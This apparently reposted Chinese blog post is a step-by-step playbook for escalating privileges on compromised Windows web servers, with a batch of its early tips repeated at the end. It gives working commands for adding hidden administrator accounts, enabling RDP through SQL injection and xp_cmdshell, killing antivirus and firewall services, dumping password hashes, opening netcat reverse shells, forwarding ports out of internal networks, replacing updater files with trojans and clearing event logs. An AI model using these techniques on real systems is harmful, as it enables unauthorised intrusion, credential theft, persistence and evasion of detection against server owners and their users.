web提權總結
阿新 • • 發佈:2019-01-11
【 web提權 】
1.能不能執行cmd就看這個命令:net user,net不行就用net1,再不行就上傳一個net到可寫可讀目錄,執行/c c:\windows\temp\cookies\net1.exe user
2.當提權成功,3389沒開的情況下,上傳開3389的vps沒成功時,試試上傳rootkit.asp 用剛提權的使用者登入進去就是system許可權,再試試一般就可以了。
3.cmd拒絕訪問的話就自己上傳一個cmd.exe 自己上傳的字尾是不限制字尾的,cmd.exe/cmd.com/cmd.txt 都可以。
4.cmd命令:systeminfo,看看有沒有KB952004、KB956572、KB970483這三個補丁,如果沒有,第一個是pr提權,第二個是巴西烤肉提權,第三個是iis6.0提權。
6.c:\windows\temp\cookies\ 這個目錄
7.找sa密碼或是root密碼,直接利用大馬的檔案搜尋功能直接搜尋,超方便!
8.cmd執行exp沒回顯的解決方法:com路徑那裡輸入exp路徑C:\RECYCLER\pr.exe,命令那裡清空(包括/c )輸入”net user jianmei daxia /add”
9.增加使用者並提升為管理員許可權之後,如果連線不上3389,上傳rootkit.asp指令碼,訪問會提示登入,用提權成功的賬號密碼登入進去就可以擁有管理員許可權了。
10.有時變態監控不讓新增使用者,可以嘗試抓管理雜湊值,上傳“PwDump7 破解當前管理密碼(hash值)”,倆個都上傳,執行PwDump7.exe就可以了,之後到網站去解密即可。
11.有時增加不上使用者,有可能是密碼過於簡單或是過於複雜,還有就是殺軟的攔截,命令 tasklist 檢視程序
12.其實星外提權只要一個可執行的檔案即可,先執行一遍cmd,之後把星外ee.exe命名為log.csv 就可以執行了。
13.用wt.asp掃出來的目錄,其中紅色的檔案可以替換成exp,執行命令時cmd那裡輸入替換的檔案路徑,下面清空雙引號加增加使用者的命令。
14.提權很無奈的時候,可以試試TV遠控,通殺內外網,穿透防火牆,很強大的。
15.當可讀可寫目錄存在空格的時候,會出現這樣的情況:’C:\Documents’ 不是內部或外部命令,也不是可執行的程式 或批處理檔案。解決辦法是利用菜刀的互動shell切換到exp路徑,如:Cd C:\Documents and Settings\All Users\Application Data\Microsoft 目錄 然後再執行exp或者cmd,就不會存在上面的情況了,aspshell一般是無法跳轉目錄的~
16.有時候可以新增使用者,但是新增不到管理組,有可能是administrators改名了,net user administrator 看下本地組成員,*administrators
17.進入伺服器,可以繼續內網滲透 這個時候可以嘗試開啟路由器 預設帳號密碼 admin admin
18.有的cmd執行很變態,asp馬裡,cmd路徑填上面,下面填:”"c:\xxx\exp.exe “whoami” 記得前面加兩個雙引號,不行後面也兩個,不行就把exp的路徑放在cmd那裡,下面不變。
19.一般增加不上使用者,或是想新增增加使用者的vbs,bat,遠控小馬到伺服器的啟動項裡,用“直接使伺服器藍屏重啟的東東”這個工具可以實現,
20.執行PwDump7.exe抓雜湊值的時候,建議重定向結果到儲存為1.txt /c c:\windows\temp\cookies\PwDump7.exe >1.txt
21.菜刀執行的技巧,上傳cmd到可執行目錄,右擊cmd 虛擬終端,help 然後setp c:\windows\temp\cmd.exe 設定終端路徑為:c:\windows\temp\cmd.exe
22.當不支援aspx,或是支援但跨不了目錄的時候,可以上傳一個讀iis的vps,執行命令列出所有網站目錄,找到主站的目錄就可以跨過去了。 上傳cscript.exe到可執行目錄,接著上傳iispwd.vbs到網站根目錄,cmd命令/c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs
23.如何辨別伺服器是不是內網? 192.168.x.x 172.16.x.x 10.x.x.x
(( dos命令大全 ))
檢視版本:ver
檢視許可權:whoami
檢視配置:systeminfo
檢視使用者:net user
檢視程序:tasklist
檢視正在執行的服務:tasklist /svc
檢視開放的所有埠:netstat -ano
查詢管理使用者名稱:query user
檢視搭建環境:ftp 127.0.0.1
檢視指定服務的路徑:sc qc Mysql
新增一個使用者:net user jianmei daxia.asd /add
提升到管理許可權:net localgroup administrators jianmei /add
新增使用者並提升許可權:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add
檢視制定使用者資訊:net user jianmei
檢視所有管理許可權的使用者:net localgroup administrators
加入遠端桌面使用者組:net localgroup “Remote Desktop Users” jianmei /add
突破最大連線數:mstsc /admin /v:127.0.0.1
刪除使用者:net user jianmei /del
刪除管理員賬戶:net user administrator daxia.asd
更改系統登陸密碼:net password daxia.asd
啟用GUEST使用者:net user guest /active:yes
開啟TELNET服務:net start telnet
關閉麥咖啡:net stop “McAfee McShield”
關閉防火牆:net stop sharedaccess
檢視當前目錄的所有檔案:dir c:\windows\
檢視制定檔案的內容:type c:\windows\1.asp
把cmd.exe複製到c:\windows的temp目錄下並命名為cmd.txt:copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt
開3389埠的命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
檢視補丁:dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt
(( SQL語句直接開啟3389 ))
3389登陸關鍵登錄檔位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中鍵值DenyTSConnections 直接控制著3389的開啟和關閉,當該鍵值為0表示3389開啟,1則表示關閉。
而MSSQL的xp_regwrite的儲存過程可以對註冊進行修改,我們使用這點就可以簡單的修改DenyTSConnections鍵值,從而控制3389的關閉和開啟。
開啟3389的SQL語句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–
關閉3389的SQL語句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,1;–
2003可以實現一句話開3389: reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 80 /f
(( 常見殺軟 ))
360tray.exe 360實時保護
ZhuDongFangYu.exe 360主動防禦
KSafeTray.exe 金山衛士 McAfee McShield.exe 麥咖啡
SafeDogUpdateCenter.exe 伺服器安全狗
(( windows提權中敏感目錄和敏感登錄檔的利用 ))
敏感目錄 目錄許可權 提權用途
C:\Program Files\ 預設使用者組users對該目錄擁有檢視權 可以檢視伺服器安裝的應用軟體 C:\Documents and Settings\All Users\「開始」選單\程式 Everyone擁有檢視許可權 存放快捷方式,可以下載檔案,屬性檢視安裝路徑 C:\Documents and Settings\All Users\Documents Everyone完全控制權限 上傳執行cmd及exp C:\windows\system32\inetsrv\ Everyone完全控制權限 上傳執行cmd及exp C:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini 預設使用者組users擁有檢視許可權 安裝mysql時會將root密碼寫入該檔案 C:\windows\system32\ 預設使用者組users擁有檢視許可權 Shift後門一般是在該資料夾,可以下載後門破解密碼 C:\Documents and Settings\All Users\「開始」選單\程式\啟動 Everyone擁有檢視許可權 可以嘗試向該目錄寫入vbs或bat,伺服器重啟後執行。 C:\RECYCLER\D:\RECYCLER\ Everyone完全控制權限 回收站目錄。常用於執行cmd及exp C:\Program Files\Microsoft SQL Server\ 預設使用者組users對該目錄擁有檢視許可權 收集mssql相關資訊,有時候該目錄也存在可執行許可權 C:\Program Files\MySQL\ 預設使用者組users對該目錄擁有檢視許可權 找到MYSQL目錄中user.MYD裡的root密碼 C:\oraclexe\ 預設使用者組users對該目錄擁有檢視許可權 可以嘗試利用Oracle的預設賬戶提權 C:\WINDOWS\system32\config 預設使用者組users對該目錄擁有檢視許可權 嘗試下載sam檔案進行破解提權 C:\Program Files\Geme6 FTP Server\Remote Admin\Remote.ini 預設使用者組users對該目錄擁有檢視許可權 Remote.ini檔案中存放著G6FTP的密碼 c:\Program Files\RhinoSoft.com\Serv-U\c:\Program Files\Serv-U\ 預設使用者組users對該目錄擁有檢視許可權 ServUDaemon.ini 中儲存了虛擬主機網站路徑和密碼 c:\windows\system32\inetsrv\MetaBase.xml 預設使用者組users對該目錄擁有檢視許可權 IIS配置檔案 C:tomcat5.0\conf\resin.conf 預設使用者組users對該目錄擁有檢視許可權 Tomat存放密碼的位置 C:\ZKEYS\Setup.ini 預設使用者組users對該目錄擁有檢視許可權 ZKEYS虛擬主機存放密碼的位置
(( 提權中的敏感登錄檔位置 ))
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\Tcp Mssql埠 HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server DenyTSConnections 遠端終端 值為0 即為開啟 HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mssql的登錄檔位置 HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ 華眾主機登錄檔配置位置 HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\ serv-u的使用者及密碼(su加密)位置 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\ WinStations\RDP-Tcp 在該登錄檔位置PortNumber的值即位3389埠值 HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers mysql管理工具Navicat的登錄檔位置,提權運用請谷歌 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters Radmin的配置檔案,提權中常將其匯出進行進行覆蓋提權 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ IIS登錄檔全版本洩漏使用者路徑和FTP使用者名稱漏洞 HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass 華眾主機在登錄檔中儲存的mssql、mysql等密碼 HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 星外主機mssql的sa賬號密碼,雙MD5加密 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ControlSet002 星外ftp的登錄檔位置,當然也包括ControlSet001、ControlSet003
(( wscript.shell的刪除和恢復 ))
載wscript.shell物件,在cmd下或直接執行:regsvr32 /u %windir%\system32\WSHom.Ocx 解除安裝FSO物件,在cmd下或直接執行:regsvr32.exe /u %windir%\system32\scrrun.dll 解除安裝stream物件,在cmd下或直接執行:regsvr32 /s /u “C:\ProgramFiles\CommonFiles\System\ado\msado15.dll” 如果想恢復的話只需要去掉/U 即可重新再註冊以上相關ASP元件,這樣子就可以用了
(( 如何找到準確的終端連線埠?))
在aspx大馬裡,點選“系統資訊”第三個就是目前的3389埠
或是執行命令檢視正在執行的服務:tasklist /svc
找到:svchost.exe 1688 TermService
記住1688這個ID值,
檢視開放的所有埠:netstat -ano
找到1688這個ID值所對應的埠就是3389目前的埠
(( iis6提權提示Can not find wmiprvse.exe的突破方法 ))
突破方法一:
在IIS環境下,如果許可權做得不嚴格,我們在aspx大馬裡面是有許可權直接結束wmiprvse.exe程序的,程序檢視裡面直接K掉
在結束之後,它會再次執行,這時候的PID值的不一樣的。這時候我們回來去執行exp,直接秒殺。
突破方法二:
虛擬主機,一般許可權嚴格限制的,是沒許可權結束的,這時候我們可以考慮配合其他溢位工具讓伺服器強制重啟,比如“直接使伺服器藍屏重啟的東東”
甚至可以暴力點,DDOS秒殺之,管理髮現伺服器不通了首先肯定是以為伺服器宕機,等他重啟下伺服器(哪怕是IIS重啟下)同樣秒殺之。
(( 本地溢位提權 ))
計算機有個地方叫快取區,程式的快取區長度是被事先設定好的,如果使用者輸入的資料超過了這個快取區的長度,那麼這個程式就會溢位了.
快取區溢位漏洞主要是由於許多軟體沒有對快取區檢查而造成的.
利用一些現成的造成溢位漏洞的exploit通過執行,把使用者從users組或其它系統使用者中提升到administrators組.
想要執行cmd命令,就要wscript.shell組建支援,或是支援aspx指令碼也行,因為aspx指令碼能呼叫.net元件來執行cmd的命令.
(( sa提權 ))
掃描開放的埠,1433開了就可以找sa密碼提權,用大馬裡的搜尋檔案功能,sa密碼一般在conn.asp config.asp web.config 這三個檔案
也可以通過登錄檔找配置檔案,看下支援aspx不,支援的話跨目錄到別的站點上找,找到之後用aspshell自帶的sql提權登入再執行命令建立使用者即可。
aspx馬提權執行命令有點不一樣,點選資料庫管理–選MSSQL–server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB–輸入帳號密碼連線即可
增加一個使用者:exec master.dbo.xp_cmdshell ‘net user jianmei daxia.asd /add’;– 提升為管理員:exec master.dbo.xp_cmdshell ‘net localgroup administrators jianmei /add’;–
PS:如果增加不上,說明是xp_cmdshell組建沒有,增加xp_cmdshell組建:Use master dbcc addextendedproc(‘xp_cmdshell’,'xplog70.dll’)
【 1433一句話開3389 】
Exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–
(( root提權 ))
利用mysql提權的前提就是,伺服器安裝了mysql,mysql的服務沒有降權,是預設安裝以系統許可權繼承的(system許可權). 並且獲得了root的賬號密碼
如何判斷一臺windows伺服器上的mysql有沒有降權? cmd命令net user 如果存在 mysql mssql這樣使用者或者類似的.通常就是它的mssql mysql服務已經被降權運行了
如何判斷伺服器上是否開啟了mysql服務? 開了3306埠,有的管理員會把預設埠改掉.另一個判斷方法就是網站是否支援php,一般支援的話都是用mysql資料庫的.
如何檢視root密碼? 在mysql的安裝目錄下找到user.myd這個檔案,root就藏在裡面,一般是40位cmd加密,一些php網站安裝的時候用的是root使用者,在conn.asp config.asp這些檔案裡。 有時會顯得很亂,這時就需要自己去組合,前17位在第一行可以找到,還有23位在第三行或是其他行,自己繼續找。
可以直接用php腳本里“mysql執行”,或是上傳個UDF.php,如果網站不支援PHP,可以去旁一個php的站,也可以把UDF.php上傳到別的phpshell上也可以。
填入帳號密碼之後,自然就是安裝DLL了,點選“自動安裝Mysql BackDoor” 顯示匯出跟建立函式成功後,緊接著執行增加使用者的命令即可。
注意:5.0版本以下(包括5.0的)預設c:\windows\系統目錄就可以了,5.1版本以上的不能匯出到系統目錄下建立自定義函式,只能匯出在mysql安裝目錄下的lib/plugin目錄中
例如:D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll
如果密碼看不見,或是組合不到40位,就本地安裝一個mysql吧, 1、停止mysql服務 2、替換下載下來的3個檔案(user.MYI user.MYD user.frm) 3、cmd切換到bin目錄下,進入mysql安全模式,cmd命令:mysqld-nt –skip-grant-tables 4、重新開啟一個cmd 切換到bin目錄下,cmd命令:mysql -u root 版本不同有可能是:mysql -uroot -proot 5、最後查詢一下就出來了select user,password from mysql.user;
(( serv-u提權 ))
這個檔案裡包含serv-u的md5密碼:C:\Program Files\RhinoSoft.com\Serv-U\\ServUDaemon.ini
找到這個檔案:ServUDaemon.ini 開啟找到:LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2
再拿md5密文去解密,再用現在的密碼登陸提權即可。
serv-u提權的前提是43958埠開了,且知道帳號密碼!
如果帳號密碼預設,直接用shell裡面的serv-u提權功能即可搞定,建議用aspx馬、php馬去提權,因為可以看回顯。
530說明密碼不是預設的,回顯330說明成功,900說明密碼是預設的……………..
在程式裡找個快捷方式,或是相關的檔案進行下載到本地,再檢視檔案的屬性,就可以找到serv-u的安裝目錄了。
目錄有修改許可權之serv-u提權:
找到serv-u的目錄,再找到使用者的配置檔案ServUDaemon.ini,直接增加一個使用者程式碼,儲存!
接著本地cmd命令:ftp 伺服器ip
回車,輸入帳號密碼再回車………………….
接著先試試普通的cmd命令提權,不行的話就使用ftp提權的命令:
Quote site exec net user jianmei daxia /add 增加一個使用者
Quote site exec net localgroup administrators jianmei /add 提升到管理員許可權
200 EXEC command successful (TID=33). 執行成功的回顯資訊
Maintenance=System 許可權型別多加一行指定新加帳號為系統管理員
ReloadSettings=True 在修改ini檔案後需加入此項,這時serv-u會自動重新整理配置檔案並生效
(( 埠轉發 ))
什麼情況下適合轉發埠?
1.伺服器是內網,我們無法連線。 2.伺服器上有防火牆,阻斷我們的連線。
轉發埠的前提,我們是外網或是有外網伺服器。
找個可讀可寫目錄上傳lcx.exe
本地cmd命令:lcx.exe -listen 1988 4567 (監聽本地1988埠並轉發到4567埠)
接著shell命令:/c c:\windows\temp\cookies\lcx.exe -slave 本機ip 1988 伺服器ip 3389 (把伺服器3389埠轉發到本地4567埠)
之後本地連線:127.0.0.1:4567 (如果不想加上:4567的話,本地執行命令的時候,把4567換成3389來執行就行了)
以上是本機外網情況下操作,接著說下在外網伺服器裡如何操作:
上傳lxc.exe cmd.exe到伺服器且同一目錄,執行cmd.exe命令:lcx.exe -listen 1988 4567
接著在aspxshell裡點選埠對映,遠端ip改為站點的ip,遠埠程填1988,點選對映埠,接著在伺服器裡連線127.0.0.1:4567就可以了。
(( nc反彈提權 ))
當可以執行net user,但是不能建立使用者時,就可以用NC反彈提權試下,特別是內網伺服器,最好用NC反彈提權。
不過這種方法, 只要對方裝了防火牆, 或是遮蔽掉了除常用的那幾個埠外的所有埠,那麼這種方法也失效了….
找個可讀可寫目錄上傳nc.exe cmd.exe
-l 監聽本地入棧資訊
-p port開啟本地埠
-t 以telnet形式應答入棧請求
-e 程式重定向
本地cmd執行:nc -vv -l -p 52 進行反彈
接著在shell裡執行命令:c:\windows\temp\nc.exe -vv 伺服器ip 999 -e c:\windows\temp\cmd.exe 最好是80或8080這樣的埠,被防火牆攔截的機率小很多
執行成功後本地cmd命令:cd/ (只是習慣而已)
接著以telnet命令連線伺服器:telnet 伺服器ip 999
回車出現已選定伺服器的ip就說明成功了,接著許可權比較大了,嘗試建立使用者!
壞蛋: 本地cmd執行:nc -vv -l -p 52 進行反彈 c:\windows\temp\nc.exe -e c:\windows\temp\cmd.exe 伺服器ip 52
低調小飛: shell執行命令c:\windows\temp\nc.exe -l -p 110 -t -e c:\windows\temp\cmd.exe
一般這樣的格式執行成功率很小,不如直接在cmd那裡輸入:c:\windows\temp\nc.exe 命令這裡輸入:-vv 伺服器ip 999 -e c:\windows\temp\cmd.exe
這個技巧成功率比上面那個大多了,不單單是nc可以這樣,pr這些提權exp也是可以的。
(( 星外提權 ))
如何知道是不是星外主機?
第一:網站物理路徑存在“freehost” 第二:asp馬裡點選程式,存在“7i24虛擬主機管理平臺”“星外主機”之類的資料夾
預設帳號:freehostrunat 預設密碼:fa41328538d7be36e83ae91a78a1b16f!7
freehostrunat這個使用者是安裝星外時自動建立的,已屬於administrators管理組,而且密碼不需要解密,直接登入伺服器即可
星外常寫目錄:
C:\RECYCLER\ C:\windows\temp\ e:\recycler\ f:\recycler\ C:\php\PEAR\ C:\WINDOWS\7i24.com\FreeHost C:\php\dev C:\System Volume Information C:\7i24.com\serverdoctor\log\ C:\WINDOWS\Temp\ c:\windows\hchiblis.ibl C:\7i24.com\iissafe\log\ C:\7i24.com\LinkGate\log C:\Program Files\Thunder Network\Thunder7\ C:\Program Files\Thunder Network\Thunder\ C:\Program Files\Symantec AntiVirus\SAVRT\ c:\windows\DriverPacks\C\AM2 C:\Program Files\FlashFXP\ c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\ C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\ c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv c:\Program Files\360\360Safe\deepscan\Section\mutex.db c:\Program Files\Helicon\ISAPI_Rewrite3\error.log c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Validate.dat C:\Program Files\Zend\ZendOptimizer-3.3.0\docs C:\Documents and Settings\All Users\DRM\ C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection C:\Documents and Settings\All Users\Application Data\360safe\softmgr\ C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\
ee提權法:
找個可讀可寫目錄上傳ee.exe
cmd命令:/c c:\windows\temp\cookies\ee.exe -i (獲取星外帳號的id值,例如回顯:FreeHost ID:724)
接著命令:/c c:\windows\temp\cookies\ee.exe -u 724 (獲取星外的帳號密碼)
vbs提權法:
找個可讀可寫目錄上傳cscript.exe iispwd.vbs
cmd命令:/c “c:\windows\temp\cookies\cscript.exe” c:\windows\temp\cookies\iispwd.vbs
意思是讀取iis,這樣一來,不但可以獲取星外的帳號密碼,還可以看到同伺服器上的所有站點的目錄。
可行思路大全:
經測試以下目錄中的檔案許可權均為everyone,可以修改,可以上傳同文件名替換,刪除,最重要的是還可以執行:
360防毒db檔案替換: c:\Program Files\360\360SD\deepscan\Section\mutex.db c:\Program Files\360\360Safe\deepscan\Section\mutex.db C:\Program Files\360\360Safe\AntiSection\mutex.db
IISrewrite3 檔案替換: C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf C:\Program Files\Helicon\ISAPI_Rewrite3\error.log
諾頓防毒檔案替換: c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Persist.Dat
一流過濾相關目錄及檔案: C:\7i24.com\iissafe\log\startandiischeck.txt C:\7i24.com\iissafe\log\scanlog.htm
其他: Zend檔案替換:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll 華盾檔案替換:C:\WINDOWS\hchiblis.ibl Flash檔案替換:C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx DU Meter流量統計資訊日誌檔案替換:c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
(( 360提權 ))
找個可讀可寫目錄上傳360.exe
cmd命令:/c c:\windows\temp\cookies\360.exe
會提示3段英文: 360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2 You will get a Shift5 door! Shift5 Backdoor created! 這是成功的徵兆,接著連線伺服器連按5下shift鍵,將彈出工作管理員,點選新建任務:explorer.exe 會出現桌面,接下來大家都會弄了……
(( 搜狗提權 ))
搜狗的目錄預設是可讀可寫的,搜狗每隔一段時間就會自動升級,而升級的檔案是pinyinup.exe
我們只要把這個檔案替換為自己的遠控木馬,或是新增賬戶的批處理,等搜狗升級的時候,就可以達成我們的目的了。
(( 華眾虛擬主機提權 ))
就經驗來說,一般溢位提權對虛擬主機是無果的,而且華眾又沒有星外那麼明顯的漏洞。
所以華眾提權關鍵之處就是蒐集資訊,主要登錄檔位置:
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass root密碼 HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss sa 密碼
c:\windows\temp 下有hzhost主機留下的ftp登陸記錄有使用者名稱和密碼
以上資訊配合hzhosts華眾虛擬主機系統6.x 破解資料庫密碼工具使用
百度搜索:hzhosts華眾虛擬主機系統6.x 破解資料庫密碼工具
(( N點虛擬主機 ))
N點虛擬主機管理系統預設資料庫地址為:\host_date\#host # date#.mdb
rl直接輸入不行 這裡咱們替換下 #=%23 空格=%20
修改後的下載地址為/host_date/%23host%20%23%20date%23196.mdb
N點資料庫下載之後找到sitehost表 FTPuser&FTPpass 值 FTPpass是N點加密資料然後用N點解密工具解密得到FTP密碼
N點預設安裝路徑C:\Program Files\NpointSoft\npointhost\web\ D:\Program Files\NpointSoft\npointhost\web\ 預設許可權可讀。遇到對方所用虛擬主機是N點時候 可以考慮 讀取該資料夾下載資料庫
N點解密工具程式碼 <% set iishost=server.CreateObject(“npoint.host”)
x=iishost.Eduserpassword(“FTPpass值”,0)
response.write x %>
本地搭建N點環境在N點目錄開啟訪問即可。得到密碼減去後10位字元即為 N點的虛擬主機管理密碼。 然後需要在管理系統登陸確認下 在hostcs 表 找到 Hostip 或者hostdomain 一般預設是 Hostip=127.0.0.1 hostdomain=www.npointhost.com 這裡可以不管 因為 這裡不修改的話就是伺服器預設ip地址sitehost 表的host_domain就是繫結的域名 直接查下IP地址即可 咱們批量的話 掃描的地址即可。 管理系統地址即為IP地址 選擇虛擬主機 登入即可 接下來傳shell大家應該都會了。 接下來說提權 hostcs表存有sa root賬戶的密碼 解密方法一樣。預設都是 解密結果123456 還有就是在adminlogo 存在N點系統管理密碼 30位的cfs加密可以在http://www.md5.com.cn/cfs 碰撞下試試 或者用asm的工具破解下我的運氣不好沒成功過 3057C0DB854C878E72756088058775 這個是預設admin的密碼
(( 脫庫 ))
asp 程式的網站一般不是access就是msssql,access資料庫脫褲很簡單,直接下載資料庫即可,mssql資料庫可以用shell自帶的脫褲功 能,找到資料庫的連線資訊,一般在web.config.asp裡,然後連線一下SA,找到會員表(UserInfo)就可以了。
PHP程式就是mysql了,找到root帳號密碼,用PHP大馬自己帶連結功能連線一下,也自己自己上傳PHP脫褲指令碼,之後找到目標資料庫(資料庫名),再找到會員表menber進行脫褲即可。
(( 伺服器 ))
命令提示符已被系統管理員停用? 解決方法:執行→gpedit.msc→使用者配置→管理模板→系統,在右側找到”阻止命令提示符”, 然後雙擊一下,在”設定”裡面選中”未配置” ,最後點選”確定”。
如何判斷伺服器的型別? 解決方法:直接ping伺服器ip,看回顯資訊進行判斷
TTL=32 9X/ME
TTL=64 linux
TTL=128 2000X/XP
TTL=255 UNIX
為什麼有時3389開放卻不能連線? 原因分析:有時候是因為防火牆,把3389轉發到其他埠就可以連線了,有的轉發後依然是連線不上,那是因為管理員在TCP/IP裡設定的埠限制 解決方法:我們需要把埠轉為TCP/IP裡設定的只允許連線的埠其中一個就可以了,更好的辦法是取消埠限制。
最簡單的往伺服器上傳東西方法是什麼? 本機開啟“HFS網路檔案伺服器”這款工具,把需要上傳的工具直接拖進左邊第一個框內,複製上面的地址,到伺服器裡的瀏覽器訪問,就可以下載了
限 制“命令提示符”的執行許可權? 我的電腦(右鍵)–資源管理器中–點選“工具”按鈕,選擇“資料夾選項”,切換到“檢視”標籤,去掉“使用簡單檔案共享(推薦)”前面的鉤,這一步是為了 讓檔案的屬性選單中顯示“安全”標籤,然後進入“c:\windows\system32\”,找到“cmd.exe”,點右鍵選擇“屬性”,切換到“安 全”標籤,將其中“組或使用者名稱稱”中除了管理員外的所有使用者都刪除,完成後點“確定”這樣當普通使用者想執行“命令提示符”的時候將會出現“拒絕訪問”的警 告框。
如何更改windows2003最大連線數? windows2003中的遠端桌面功能非常方便,但是初始設定只允許2個使用者同時登陸,有些時候因為我在公司連線登陸後斷開,同事在家裡用其他使用者登陸 後斷開,當我再進行連線的時候,總是報錯“終端服務超過最大連線數”這時候我和同事都不能登陸,通過以下方法來增加連線數,運 行:services.msc,啟用license logging,別忘了新增完畢後再關閉 License Logging 開啟win2k3的控制面板中的“授權”,點“新增許可”輸入要改的連線數
如何清除伺服器裡的IP記錄日誌? 1.我的電腦右鍵管理–事件檢視器–安全性–右鍵清除所有事件 2.開啟我的電腦–C盤–WINDOWS–system32–config–AppEvent.Evt屬性–安全–全部都拒絕 3.Klaklog.evt屬性–安全–全部都拒絕–SecEvent.Tvt屬性–安全–全部都拒絕
1.能不能執行cmd就看這個命令:net user,net不行就用net1,再不行就上傳一個net到可寫可讀目錄,執行/c c:\windows\temp\cookies\net1.exe user
2.當提權成功,3389沒開的情況下,上傳開3389的vps沒成功時,試試上傳rootkit.asp 用剛提權的使用者登入進去就是system許可權,再試試一般就可以了。
3.cmd拒絕訪問的話就自己上傳一個cmd.exe 自己上傳的字尾是不限制字尾的,cmd.exe/cmd.com/cmd.txt 都可以。
4.cmd命令:systeminfo,看看有沒有KB952004、KB956572、KB970483這三個補丁,如果沒有,第一個是pr提權,第二個是巴西烤肉提權,第三個是iis6.0提權。
6.c:\windows\temp\cookies\ 這個目錄
7.找sa密碼或是root密碼,直接利用大馬的檔案搜尋功能直接搜尋,超方便!
8.cmd執行exp沒回顯的解決方法:com路徑那裡輸入exp路徑C:\RECYCLER\pr.exe,命令那裡清空(包括/c )輸入”net user jianmei daxia /add”
9.增加使用者並提升為管理員許可權之後,如果連線不上3389,上傳rootkit.asp指令碼,訪問會提示登入,用提權成功的賬號密碼登入進去就可以擁有管理員許可權了。
10.有時變態監控不讓新增使用者,可以嘗試抓管理雜湊值,上傳“PwDump7 破解當前管理密碼(hash值)”,倆個都上傳,執行PwDump7.exe就可以了,之後到網站去解密即可。
11.有時增加不上使用者,有可能是密碼過於簡單或是過於複雜,還有就是殺軟的攔截,命令 tasklist 檢視程序
12.其實星外提權只要一個可執行的檔案即可,先執行一遍cmd,之後把星外ee.exe命名為log.csv 就可以執行了。
13.用wt.asp掃出來的目錄,其中紅色的檔案可以替換成exp,執行命令時cmd那裡輸入替換的檔案路徑,下面清空雙引號加增加使用者的命令。
14.提權很無奈的時候,可以試試TV遠控,通殺內外網,穿透防火牆,很強大的。
15.當可讀可寫目錄存在空格的時候,會出現這樣的情況:’C:\Documents’ 不是內部或外部命令,也不是可執行的程式 或批處理檔案。解決辦法是利用菜刀的互動shell切換到exp路徑,如:Cd C:\Documents and Settings\All Users\Application Data\Microsoft 目錄 然後再執行exp或者cmd,就不會存在上面的情況了,aspshell一般是無法跳轉目錄的~
16.有時候可以新增使用者,但是新增不到管理組,有可能是administrators改名了,net user administrator 看下本地組成員,*administrators
